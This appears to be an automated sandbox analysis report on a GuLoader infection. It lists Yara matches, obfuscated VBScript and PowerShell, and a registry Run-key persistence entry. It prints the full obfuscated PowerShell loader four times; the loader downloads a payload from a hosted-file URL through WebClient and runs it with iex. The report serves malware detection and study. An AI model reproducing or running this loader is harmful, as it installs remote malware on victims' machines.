Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Ricki = 1;$Gehenna='Substrin';$Gehenn", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 00000009.00000002.1940984455.000000000965B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1930663126.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Takningers161 $Erhvervsrets $Tropein), (Isbaadenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aeroelastic = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Plirede230)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Indlggelse, $false).DefineType($Euklidisk, $St
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF8879900BD pushad ; iretd 3_2_00007FF8879900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887997954 push ebx; retf 3_2_00007FF88799796A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202109AD push ecx; mov dword ptr [esp], ecx 12_2_202109B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A056DD push dword ptr [ebx+edx*8]; ret 12_2_02A056E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A037CC push edi; ret 12_2_02A03806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A02A0A push es; retf 12_2_02A02A0C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A0384E push edi; ret 12_2_02A03806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A0498C push cs; ret 12_2_02A0498F

Boot Survival
barindex
Creates autostart registry keys with suspicious names
Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
